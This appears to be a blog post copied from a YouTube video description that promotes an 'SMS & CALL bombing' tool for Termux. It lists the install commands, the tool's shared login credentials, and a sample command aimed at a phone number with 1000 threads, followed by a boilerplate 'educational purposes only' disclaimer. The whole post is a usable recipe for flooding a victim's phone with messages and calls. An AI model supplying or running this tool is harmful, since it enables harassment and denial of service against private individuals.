[Termux] Unlimited SMS & CALL Bombing for free! Latest tool 2020!

SMS Bombing using Termux



Hi there!  Welcome to a brand new channel “iTzTuner” Here you will get the latest Mastermind Tech Cracking. Security Penetration Tutorials, Termux, and Kali Linux Tutorials.



Previous Video on how to do it in Kali Linux: https://www.youtube.com/watch?v=Eg7K2... Commands:

pkg install git && pkg install python -y && pkg install python2 code-box

cd Xattack code-box chmod +x * code-box 
pip2 install –r requirements.txt code-box 
pip install requests code-box 
pip install mechanize code-box 
python2 xattack.py code-box

First step login: Username: XowmikXoss Password: XowmikXoss alert-warning

Second step login: Username: JokerSowmik Password: JokerSowmik alert-warning


python xowmik-system --tool SMS --target +880xxxxxxxxxxx --timeout 120 --threads 1000 code-box

You are done! alert-success

If you get No module error, try these fixes: 1. pkg install python3 2. pip2 install requests 3. pip2 install mechanize Make sure that, you have installed the requirements.txt file! Best of luck dude.


Subscribe Xowmik Xoss YT and Turn On notification! alert-success





 Get free internet updates and simple but gorgeous tech tricks at our website:
===============================  Find me: --------------------------------------------------------------  Disclaimer: The video is for educational purposes only. If anyone misuse of this video, me or my team or my channel won’t be responsible. My request Please Don’t harm anyone, just learn and make it your treasure! ------------------------------------------------------------  Copyright: My video is created by me and my team. I always try to avoid copyright. But unfortunately, if any of the creators get their content, please do not report my channel. Mail me at Xowmik@gmail.com ; I promise that, I will remove the content within 71 hours. Thank You!

0/Post a Comment/Comments

Previous Post Next Post